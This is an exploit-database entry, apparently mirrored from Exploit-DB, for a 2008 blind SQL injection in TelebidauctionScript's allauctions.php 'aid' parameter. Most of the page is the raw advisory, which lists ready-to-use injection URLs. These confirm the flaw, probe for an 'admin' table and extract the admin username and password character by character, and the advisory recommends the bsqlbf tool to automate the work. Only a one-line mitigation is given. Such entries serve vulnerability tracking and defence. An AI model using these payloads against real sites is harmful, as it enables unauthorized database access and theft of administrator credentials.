header-logo
Suggest Exploit
vendor:
TelebidauctionScript
by:
Hussin X
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: TelebidauctionScript
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

TelebidauctionScript(aid) Blind SQL Injection Vulnerability

TelebidauctionScript is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries into the 'aid' parameter of the 'allauctions.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The attacker can use the 'bsqlbf' tool to write detailed information.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

TelebidauctionScript(aid) Blind SQL Injection Vulnerability
____________________________________

Author : Hussin X

Home : www.IQ-TY.com

email : darkangel_g85@Yahoo.com

____________________________________

Vendor : http://www.telebidauctionscript.com/

Demo :
_______


http://server/allauctions.php?aid=2+and+1=1 (true)


http://server/allauctions.php?aid=2+and+1=0 (false )


:: Table ::

http://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1


:: column pass and username ::

http://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1

http://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1

note : Use the "bsqlbf" to write detailed information

Greetz
WwW.IQ-ty.CoM , Tryag.cc

| CraCkEr | Cyber-Zone | str0ke | jiko